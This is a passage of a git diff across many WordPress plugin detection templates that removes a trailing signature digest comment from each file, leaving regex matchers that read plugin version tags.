b/http/technologies/wordpress/plugins/backwpup.yaml index 913c65af9b..11cb41fb2c 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022012834c7145dd13535b48f5994b98718cf77932a83ac74462b2ab1a5d3a4865af0220270ba9647069746f1391cea250f4fdad8f76de8622f81a1554a0ca3c1e067a4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index 21721622b7..df3c5f3a94 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022005817915203d2e2b08d9c6ffeba37a5c63282f744b3e4a69d51d57265b95723e022017db5c445ccaf830c7803f783b368fe5b3d9df33c01f644fc6bcbdba0147a930:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index de6f5dda7f..6a50e049dc 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044021f729fceeedc0bf5d6931f4cd3eaf70066f96f73fb7c0bb217920f92985f51de022100b5663f4e4002fb0b08f55ff9c801a7c95ef7ef26686080fedba655bb045028f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index aa3f7ef3c8..e532694167 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220390a6f717fc6ccd733377542655707562dbc3ef4607b2dc70a3e9af27d419682022100cebee3f29a8aa6ecb362ab2aa3442378cd6498fe244d20ce12e8325c7709fc44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 82fd1041e0..4c6e616c1d 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100af0af8d83434253a81739b0bbbfcfa1cdcb3ea0126ff01bd2c0bb1a75bfdef1b022100f1c47c399889c10f5ee6aedc213a681d962cb0acbff81e03b0dad17487ffad1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 588af22f92..a70a58690c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207858492ef712c6ac37539ea57e1b5fe591b8b7008ec3f59e359f920a1a36712202205896a5628f07dcba5f8062717f0ab0a1c50949775f1509d28bd63645a110605e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 5694a17235..f8691caf0a 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210080d6915c63ab73d033b80cabc8f2a4c8da9ddef3affd8c0d7374e3fb2c6ab05d02205abe4aed154aeae7197e06712286c9d65cf7027d13c3ad2e75739f87a29a99d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index d87cacbffa..0cd866179e 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009f6cac3c9b4ff74884c9277e4f02336610d7aa5a1a9cc1d819e4a05ebb82f6a1022033bdd9989764d8068803685d9c49717bf6d62f534e5c7a626c7cdb79c91498d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index d45087d5ee..b1d8479d13 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201d51b198d4a448c1e662c47b7c57582a3f0684c52874a40cb128e3ee9300465b02207dfce9c7dd9bd6dda0576a047f745bc0f308d1a77b308647145070f80a9a4376:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 7198eeed31..04e090313f 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207db54d4b25071255413dbc366efb4deff83878e8a02739da8a04719ef2b0203c022100f68525b7b55b3036a6ea8ac16f47da33c62304cff7c8460a762ad3441777211d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 334f2614f7..57e618924b 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f0e0a40229feddc6ae7bbb29bbc6b16007ff46cefbd3ae8a0251493a74f27b89022100fe76f825651d08b6c7c4c24603e886ae0ad783cea55092d1dd79a0cf3d837d30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 8741b72594..571b3b20a3 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d41f5e9ba43e14bdc7932a3f24ab4d3c213980239c6a710a801ebda9483a0da6022028bc8bd58554102ec7031498613e1bccb2f0bb55170743871364f721e5fa924d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index e5e0156321..4d562316b4 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201c7f16c5b2eaa537fe7ed07230a4e1b86134f0518bc7cafe8e178bd2ab76c471022100ff83998bf3df91b8bba035d73c1ae03a6918b7896017bcf5bc938a8c3dcee93a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index ccb76df377..dcea952545 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f656b3120005e7bac0ea16d590010a864b93d8b353cef94a60df5119977ba578022058c9208da42b51ecaf4d57c8e462a87259b7e8ae18f1fcb0df8ce76bc8722856:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 22963877c8..0ae2f18122 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220624eea0ec41b9e91a807fbe2d272aa74077c8b05996d6fcf7f3b743013c3cc1b02202918d8b45d66d599e920d8c0335a527aac8acbdb2273a5b4983fdaa6681314f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index c052c66ad9..12f549d536 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203b299812df7ccee94fdeb1b1507c3bba829f6c9e9991a79a2d94cdef9d87d331022062ef76c6c7591a52bc4f9e6cc9edc38a1eb22bde604830556d0c3e7e6e56b922:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 18e1e5b303..d8ea6a72f1 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d8cad3d98c96a3165cfe8307a28491aeb47572584c2972d11e88d042c3ce82b3022100f32964ceed3aa224ddc0156d190909129003bb2221f4f6176936c761177fc0eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 912a7fbb0f..e13909fff3 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201422bcc3dcaf578ce0cd2d69f29c3409fb916794b4101dc2178f0d89e1acfcef022060fdfa47c12266baa29fd74167b68b0decaf17f87a447e38fdfc26b5562bcb76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 154a5e4936..88fea67f93 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e7ab57a76f0b29e838a2144344772890e5aecbf97fe1d926aba6129c3bc2a838022100e8d6165cab53bf8a2e6fc5e224be1be0ecf9b3388043b60ad2500d19d9448d75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index 2a7753a96f..d205cdbf36 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d57c6cbbd9faa2564c16620b01b4494b3a7b60749921a317f0cd05ceb7ea72e9022000b3d637d2b51491ef162f04b4c6b4b117973b8add9951ccfdeb749980889e46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 9eae96c22b..3fa20df7d2 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204c85ac893dc0fb83c537d8249e191e26e010893b5d591143acfb9d993614843102200d0ea9fa1a27a03b9bc381eefdfd638301cbbc235ea144f940b34dd259f4e6fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index bc6e9dd487..bcd63ced86 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207adc5e5e1737475d9a831a5546e6e63968bb0c64b0998b99842b03e10230bc3e02203877817ef0ce18435d9442ed685a63b5c2baa28a8c60a393eed3fc4dc3c62859:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index 20fe255c00..bca0326f2b 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022049592287459468349a4c885175df03275c599874516d9461d2b7b4a6aa5a5d0c022100c387af15ecf82013a90a1bc0f80e28e414323b9ac5fb288092b1a0ea0cb56aad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index e52a93f220..854328f04b 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fc09f27fcc676069b878d3d7b5a7c9d52bfde2404838898f3d11847ce62897390220118b324e264d8f07d76c3f496e420a5276f842dbe177041ecbe68453d0154bf9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index a1ceac5a06..6d3f7f4566 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202f1c50f9663ce3b89317160e1f26b34e2dfbdb3ca56ca9bbd3c1f98065948490022100af88c48e4c01ea4b658589fb2664a3a3208ee8df322e72305f334cce971ad53d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index 160ed767d2..dafbd25c9e 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210087b69fa15e35c51cb65e67f9281135abcded8113be3923e530d9184607cfe4390220159c17ccaad8ce2c731f35038d818dc7fd8c992f9568b83661b6de72fa946de1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 31f3203681..f10480fc8f 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fea305981282825f6498fb44ac71f258f8482fb6b7c1795b5b82afeac0a9324802204c214f876ab308560379af6c7da183ea271547aa227c360599f9203eaebd8776:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index b2c82fb4d3..6c92091767 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220307376db5b642d57cf1bd55a74890e833a980306494f71ec2111365f59338de002200785592641b90a08839d13b0d6b9cdd29a1fbdff0a0873e12c49309239759173:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index b2bf642c36..b25c6c9a9c 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bf31b208a7d97575ac3ec176a9a0c75b7ffaf869aa53c5312da1051250973047022100b2412945b3e8778e44fac9cc4a8220b56138b85dbd72db9fe7bdaffeaad999f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 3d537b4fb9..1781172d05 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d22176e3c0a881e626c9209fc1528b4186a147355f3568c9f755255c456b08d402210087b4092dfbafedeaacaf762d5283dc7d813cd27ee62c289f94133193a3ed4395:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 91edc5edd5..92c8ce3409 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203f26615d2c83f0861dc5b9d8db738dd554d4a9a780a0807e26c0f0d6fc3a36cc0220321513e3161c23ea8eb6d3a26196bd8f14dfd1438690e017f24103bc9af0d8ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index c29c5b8d55..eea42ed8da 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009bb6cf456ee690b31a5774fcdb09db404307f18f42a4c64edee5bf90e3c4e0230220278423ff0a77b2ad3cd6ff76b58283dfcf99337095cde15f1787b78cfc920a78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index 84851ef046..bedb85a0eb 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022018676fca78c040d560ba8070ca11fe2cafbc6f7c9377d910e20ddab704306040022041559de5056bd2d01b03c8ec339be437c04e168022d9cbbc82a125b61cb1ead7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index c5767897eb..45bbbc71df 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220544e1bb18aa012c9fa84bb48bf84c186e3e15f806cb5d4ae8aaa80b86bfb6cf702206233be9305fe87ecea07306458770caef64111b21c3e074eb717509477a2b705:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index d9c62eca34..03befac73e 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207bcf7a9964f0825d35389490dc357dc89c0820321f43f70cd7b6dfcfd741ef260221009be93343c50efd39895e1a3377d06a332dd489d54f98e869569ad30ef65aa625:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 14b6a946e3..fe4c223cba 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ad01207f6983cef0fd45cd0e8f3a77f4aa886b832feaed0a2d547554d58f35d1022100b061fe154f6e23a818b9b0ef557b1630ae9bc118ebfb2f7b7d378a0c0998ecd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 387da49c25..0db316d66d 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009c69214526a5c6b3385b064cb492e6ec34cc857429b6d9694a8e099c1cc5b34702205a8ff9dada3d1aa5d24aeaa91671f0f5ceb3098613278551b38b6093768a71ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 4a08d56ec1..135639253d 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100de0b55b33a7708d0da148d55ebe2b028b987c268ad148ab2f87c1f2a489f5c59022100e2f3bb693c3b122091739b4177080e225ae2b28d63d877317813b993c714c189:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 68e4e8bb22..540fbaf9ac 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100970e83ef2e2b65e8554af125a04ca745d2c2c94193335dea3c7bec89da82e2f0022100fecd522c2fe100cd43cd0b64220ba67fd2b2a15ef4de53437bdba55d60224acc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index f41e29fc19..7e71b4736f 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022052dcfc2956defb1bb65162f52302bb38441a8819a330aa50bfcf572a668b798302203c19bd7f5e838c50d60bf613b1b0d5c12e44c03455aeee8d773577a51e7546d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 2ff8d43fe6..5ea77f898d 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022069fc06111975463514887dc70ed6ed1897cb61474dd6ba44f2f339cd1f08bbb30220175c2c92ccb77cb51afacd00d548e8822dac23b16a97f653c028649dd9e762a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 8ac30951d0..fc498e67e6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220193d1545b4c0e8904b07e9f5fb59cb5df9b92194f9eb6c055a89097207a9339402204a1dca73e3e49cb42d4848528a64d86eeac2caf7a83c0890fd1d151030567530:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/extendify.yaml b/http/technologies/wordpress/plugins/extendify.yaml index 8e181f343f..554a7ddc52 100644 --- a/http/technologies/wordpress/plugins/extendify.yaml +++ b/http/technologies/wordpress/plugins/extendify.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022033be677a134b1461ab506cf07eec77051addbce25a10d6400cbf4c806949787a0221008b8d0113d0c79d36aab11072b267d92e2e549ea1e3ac4aabf9a623d676d59fde:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index e175770fcb..465aa93d57 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ee873986f046d3565bc94fbe97f082dd349de0e29b2cfea69fb712c0bb97fc00022100fb68f0a7635ba9bd6c7dc0464f6dd3da95e3a67ef6bf1ae8dc591e01bc8c9436:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index e828d80c78..2a1b0e57a9 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022079e48f02aa2bda092238ff20de7b9627005fc200716f1ac7482d5c62d22c8248022021f85b0df89fb55689e29bd9ded075049feab7c9c7089798391ef0559934b7dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 4df5e96bfe..033cc4bc3d 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bcb6961affb028cffdf9ee911ad2311fbb916c7c9bf8936c52d5dfbc27e89c2a022023542fb817104e33d986039ed51832825488035a91901a7480273c92f17807a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluent-smtp.yaml b/http/technologies/wordpress/plugins/fluent-smtp.yaml index 5aab82686a..4a3dcbd210 100644 --- a/http/technologies/wordpress/plugins/fluent-smtp.yaml +++ b/http/technologies/wordpress/plugins/fluent-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207afdb0bd5c26b02cdc16c099aa74ccf9f002a43c7346899dc050f4049ae7e7ef022100dc794ac4534f870aa19fa981e5eef9f46db7a003326dbed77567cb27db992833:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 87fdac1444..945ab6ad03 100644 --- 